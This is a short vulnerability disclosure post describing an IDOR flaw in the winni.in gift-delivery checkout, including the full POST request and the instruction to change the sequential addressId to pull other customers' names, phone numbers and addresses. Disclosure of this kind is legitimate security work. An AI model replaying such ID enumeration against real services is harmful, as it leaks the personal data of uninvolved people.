Almost 1 year ago I reported one PII Data leak to Winni Bug Bounty Program.

After 20+ follow up mail I am disclosing the issue though Winni team fixed the issue silently without responding back.

So the issue is a pretty straight forward IDOR

Winni delivers cake and gift to your loved one , while placing the order before payment its ask for the address.

While selecting the address one POST request made to fetch the address in reference to addressId.

    POST /checkout/adv/address/select-previous HTTP/1.1
    Host: winni.in
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101   
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 16
    Origin: winni.in
    Connection: close
    Referer: winni.in/checkout/adv/address
    Cookie: AWSALBTG=XXX

    addressId=685945

Alter the addressid value to fetch other user's address along with name and phone number.

As the addressId is sequential an attacker can fetch all address available in the database . Which will result mass PII leaks including data such as names, phone numbers and addresses.

POC

PS- Don't waste your time by reporting their bug bounty program.

Thanks for reading, any suggestion feedback are welcome